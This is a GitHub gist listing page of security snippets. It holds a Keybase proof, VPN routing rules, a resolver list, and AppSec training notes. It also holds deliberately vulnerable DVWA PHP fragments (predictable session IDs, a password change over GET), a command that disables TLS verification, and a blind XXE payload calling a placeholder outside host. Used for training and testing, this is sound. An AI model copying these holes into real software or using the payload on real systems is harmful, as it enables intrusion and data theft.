I hereby claim:
- I am sapran on github.
- I am sapran (https://keybase.io/sapran) on keybase.
- I have a public key ASCg87kjeGdgg5LRWhJaXNpVDoskuE-d1KyB2dmQkfS5EQo
To claim this, I am signing this object:
Vlad Styran sapran
sapran
/ keybase.md
Created
January 24, 2021 10:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NODE_TLS_REJECT_UNAUTHORIZED=0 proxychains4 -f ~/proxychains.conf /Applications/Grammarly.app/Contents/MacOS/Grammarly |
sapran
/ iptables_vpn
Created
October 29, 2018 15:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ip rule add from $(ip route get 1 | grep -Po '(?<=src )(\S+)') table 128 | |
| ip route add table 128 to $(ip route get 1 | grep -Po '(?<=src )(\S+)')/32 dev $(ip -4 route ls | grep default | grep -Po '(?<=dev )(\S+)') | |
| ip route add table 128 default via $(ip -4 route ls | grep default | grep -Po '(?<=via )(\S+)') |
sapran
/ resolvers.txt
Last active
October 16, 2018 17:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1.2.4.8 | |
| 103.22.248.62 | |
| 106.186.17.181 | |
| 109.69.8.34 | |
| 109.69.8.51 | |
| 111.223.252.161 | |
| 114.114.114.114 | |
| 114.114.114.119 | |
| 114.114.115.115 | |
| 114.114.115.119 |
sapran
/ sample3.php
Last active
April 6, 2018 07:35
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $html = ""; | |
| if ($_SERVER['REQUEST_METHOD'] == "POST") { | |
| if (!isset ($_SESSION['last_session_id'])) { | |
| $_SESSION['last_session_id'] = 0; | |
| } | |
| $_SESSION['last_session_id']++; | |
| $cookie_value = $_SESSION['last_session_id']; |
sapran
/ sample2.php
Last active
April 6, 2018 07:35
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if( isset( $_GET[ 'Change' ] ) ) { | |
| // Get input | |
| $pass_new = $_GET[ 'password_new' ]; | |
| $pass_conf = $_GET[ 'password_conf' ]; | |
| // Do the passwords match? | |
| if( $pass_new == $pass_conf ) { | |
| // They do! |
sapran
/ appsec_awareness_training_day3.md
Last active
March 29, 2018 06:43
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
OWASP DVWA
- https://github.com/ethicalhack3r/DVWA
- Docker: dvwa:latest
Metasploitable3 + Metasploit Framework
sapran
/ appsec_awareness_training_day2.md
Last active
March 27, 2018 17:43
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
- https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
- https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
- Least Privilege
- Fail-Safe Defaults
sapran
/ vagrant-patch-for-virtualbox-5.2
Created
March 25, 2018 19:39
— forked from roktas/vagrant-patch-for-virtualbox-5.2
Patch to make vagrant work with VBox 5.2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| set -eo pipefail | |
| TARGETFMT='/opt/vagrant/embedded/gems/gems/vagrant-%s/plugins/providers/virtualbox/driver/meta.rb' | |
| die() { echo >&2 "$@"; exit 1; } | |
| [[ $EUID -eq 0 ]] || die "sudo required" |
sapran
/ oob_xxe
Created
March 25, 2018 09:45
Taken from this article: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
NewerOlder